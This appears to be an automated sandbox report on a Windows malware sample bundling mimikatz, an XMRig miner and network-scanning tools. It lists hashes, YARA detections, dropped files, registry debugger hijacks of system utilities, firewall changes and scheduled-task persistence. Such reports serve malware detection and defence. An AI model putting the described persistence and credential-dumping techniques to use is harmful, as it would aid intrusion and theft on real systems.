Analysis
max time kernel: 151s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20240319-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240319-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-04-2024 01:25
Behavioral task: behavioral1
Sample: 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en
General
Target: 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
Size: 17.3MB
MD5: e9aa571d6c2ddd4600b7e545b4de3253
SHA1: 64061e225c9002334e1f2d60dd1e4f02f756c3a4
SHA256: 9140efaf3b56d268ba6b39e77ff2723c3d1a0f2473007d975d42ef8cd504adf8
SHA512: 3a7fa2a502ab5ec8063901968b98958b0e3a1affdceffa9c5c812a96e32c3de629cbf4dccaae997b8402b0f33259eb6f0eee5ddbcb8a3ed19b30c1de819b7138
SSDEEP: 98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: suahuuu.exe
description | pid | process | target process PID
PID 2472 created 1884 | 2472 | suahuuu.exe | spoolsv.exe
Contacts a large (23687) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 41 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3752-0-0x0000000000400000-0x0000000000AA4000-memory.dmp | UPX
C:\Windows\lbbdqheb\suahuuu.exe | UPX
behavioral2/memory/1796-7-0x0000000000400000-0x0000000000AA4000-memory.dmp | UPX
behavioral2/memory/3692-136-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp | UPX
C:\Windows\tdtbtjeet\Corporate\vfshost.exe | UPX
behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp | UPX
C:\Windows\Temp\tdtbtjeet\gbvdtzbdv.exe | UPX
behavioral2/memory/960-141-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/960-144-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
C:\Windows\Temp\vleitjdvn\bgjnyg.exe | UPX
behavioral2/memory/3416-159-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/2552-171-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-174-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/432-176-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3576-180-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-183-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/960-189-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-192-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/2864-195-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/2116-199-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-202-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/2156-204-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/4260-208-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/2380-212-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-214-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/1064-217-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-219-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/3724-222-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/2136-226-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-240-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/6180-242-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/4400-244-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-245-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/6536-247-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/5944-249-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/5224-252-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/6796-254-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-255-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/6668-257-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | UPX
behavioral2/memory/3416-259-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
behavioral2/memory/3416-261-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | UPX
XMRig Miner payload 11 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3416-174-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-183-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-192-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-202-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-214-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-219-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-240-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-245-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-255-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-259-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
behavioral2/memory/3416-261-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | xmrig
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3752-0-0x0000000000400000-0x0000000000AA4000-memory.dmp | mimikatz
C:\Windows\lbbdqheb\suahuuu.exe | mimikatz
behavioral2/memory/1796-7-0x0000000000400000-0x0000000000AA4000-memory.dmp | mimikatz
behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp | mimikatz
Drops file in Drivers directory 3 IoCs
Processes: suahuuu.exe, wpcap.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | suahuuu.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | suahuuu.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes: netsh.exe
pid | process
768 | netsh.exe
2960 | netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
Processes: suahuuu.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | suahuuu.exe
Executes dropped EXE 31 IoCs
Processes: suahuuu.exe, wpcap.exe, tgjjdisve.exe, vfshost.exe, gbvdtzbdv.exe, xohudmc.exe, nspfoo.exe, bgjnyg.exe, mfhjlqvzt.exe
pid | process
1796 | suahuuu.exe
2472 | suahuuu.exe
4092 | wpcap.exe
2864 | tgjjdisve.exe
3692 | vfshost.exe
960 | gbvdtzbdv.exe
3864 | xohudmc.exe
2748 | nspfoo.exe
3416 | bgjnyg.exe
2552 | gbvdtzbdv.exe
432 | gbvdtzbdv.exe
3576 | gbvdtzbdv.exe
960 | gbvdtzbdv.exe
4856 | suahuuu.exe
2864 | gbvdtzbdv.exe
2116 | gbvdtzbdv.exe
2156 | gbvdtzbdv.exe
4260 | gbvdtzbdv.exe
2380 | gbvdtzbdv.exe
1064 | gbvdtzbdv.exe
3724 | gbvdtzbdv.exe
2136 | gbvdtzbdv.exe
3080 | mfhjlqvzt.exe
6180 | gbvdtzbdv.exe
4400 | gbvdtzbdv.exe
6536 | gbvdtzbdv.exe
5944 | gbvdtzbdv.exe
5936 | suahuuu.exe
5224 | gbvdtzbdv.exe
6796 | gbvdtzbdv.exe
6668 | gbvdtzbdv.exe
Loads dropped DLL 12 IoCs
Processes: wpcap.exe, tgjjdisve.exe
pid | process
4092 | wpcap.exe (9 entries)
2864 | tgjjdisve.exe (3 entries)
Processes:
resource | yara_rule
behavioral2/memory/3692-136-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp | upx
C:\Windows\tdtbtjeet\Corporate\vfshost.exe | upx
behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp | upx
C:\Windows\Temp\tdtbtjeet\gbvdtzbdv.exe | upx
behavioral2/memory/960-141-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/960-144-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
C:\Windows\Temp\vleitjdvn\bgjnyg.exe | upx
behavioral2/memory/3416-159-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/2552-171-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-174-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/432-176-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3576-180-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-183-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/960-189-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-192-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/2864-195-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/2116-199-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-202-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/2156-204-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/4260-208-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/2380-212-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-214-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/1064-217-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-219-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/3724-222-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/2136-226-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-240-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/6180-242-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/4400-244-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-245-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/6536-247-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/5944-249-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/5224-252-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/6796-254-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-255-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/6668-257-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp | upx
behavioral2/memory/3416-259-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
behavioral2/memory/3416-261-0x00007FF619C00000-0x00007FF619D20000-memory.dmp | upx
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
93 | ifconfig.me
95 | ifconfig.me
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes: wpcap.exe, xohudmc.exe, suahuuu.exe
description | ioc | process
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File created | C:\Windows\SysWOW64\nspfoo.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\nspfoo.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | suahuuu.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | suahuuu.exe
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A | suahuuu.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A | suahuuu.exe
Drops file in Program Files directory 3 IoCs
Processes: wpcap.exe
description | ioc | process
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
Drops file in Windows directory 60 IoCs
Processes: suahuuu.exe, 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe, mfhjlqvzt.exe, cmd.exe
description | ioc | process
File created | C:\Windows\tdtbtjeet\biqhmcbuq\Packet.dll | suahuuu.exe
File created | C:\Windows\lbbdqheb\vimpcsvc.xml | suahuuu.exe
File opened for modification | C:\Windows\lbbdqheb\spoolsrv.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\AppCapture32.dll | suahuuu.exe
File created | C:\Windows\lbbdqheb\suahuuu.exe | 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\schoedcl.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\Corporate\vfshost.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.dll | suahuuu.exe
File created | C:\Windows\lbbdqheb\svschost.xml | suahuuu.exe
File opened for modification | C:\Windows\lbbdqheb\svschost.xml | suahuuu.exe
File opened for modification | C:\Windows\lbbdqheb\vimpcsvc.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\ssleay32.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\spoolsrv.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\spoolsrv.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\cnli-1.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\exma-1.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\trch-1.dll | suahuuu.exe
File opened for modification | C:\Windows\lbbdqheb\schoedcl.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\zlib1.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\svschost.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\vimpcsvc.xml | suahuuu.exe
File opened for modification | C:\Windows\tdtbtjeet\biqhmcbuq\Result.txt | mfhjlqvzt.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\crli-0.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\spoolsrv.xml | suahuuu.exe
File created | C:\Windows\lbbdqheb\spoolsrv.xml | suahuuu.exe
File opened for modification | C:\Windows\lbbdqheb\docmicfg.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\vimpcsvc.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\schoedcl.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\trfo-2.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\docmicfg.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\libxml2.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\ucl.dll | suahuuu.exe
File created | C:\Windows\lbbdqheb\schoedcl.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\docmicfg.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\AppCapture64.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\biqhmcbuq\mfhjlqvzt.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\coli-0.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\tibe-2.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\xdvl-0.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\docmicfg.xml | suahuuu.exe
File opened for modification | C:\Windows\lbbdqheb\suahuuu.exe | 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\tucl-1.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\svschost.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\vimpcsvc.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\biqhmcbuq\ip.txt | suahuuu.exe
File created | C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\posh-0.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\schoedcl.xml | suahuuu.exe
File opened for modification | C:\Windows\tdtbtjeet\Corporate\log.txt | cmd.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\Shellcode.ini | suahuuu.exe
File created | C:\Windows\tdtbtjeet\Corporate\mimidrv.sys | suahuuu.exe
File created | C:\Windows\tdtbtjeet\biqhmcbuq\scan.bat | suahuuu.exe
File created | C:\Windows\tdtbtjeet\upbdrjv\swrpwe.exe | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\libeay32.dll | suahuuu.exe
File created | C:\Windows\tdtbtjeet\UnattendGC\specials\svschost.xml | suahuuu.exe
File created | C:\Windows\lbbdqheb\docmicfg.xml | suahuuu.exe
File created | C:\Windows\tdtbtjeet\Corporate\mimilib.dll | suahuuu.exe
File opened for modification | C:\Windows\tdtbtjeet\biqhmcbuq\Packet.dll | suahuuu.exe
File created | C:\Windows\ime\suahuuu.exe | suahuuu.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe
pid | process
1732 | sc.exe
2016 | sc.exe
1132 | sc.exe
2408 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource | yara_rule
C:\Windows\lbbdqheb\suahuuu.exe | nsis_installer_2
C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe | nsis_installer_1
C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe | nsis_installer_2
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe
pid | process
5064 | schtasks.exe
4688 | schtasks.exe
2840 | schtasks.exe
Modifies data under HKEY_USERS 49 IoCs
Processes: gbvdtzbdv.exe, suahuuu.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | suahuuu.exe
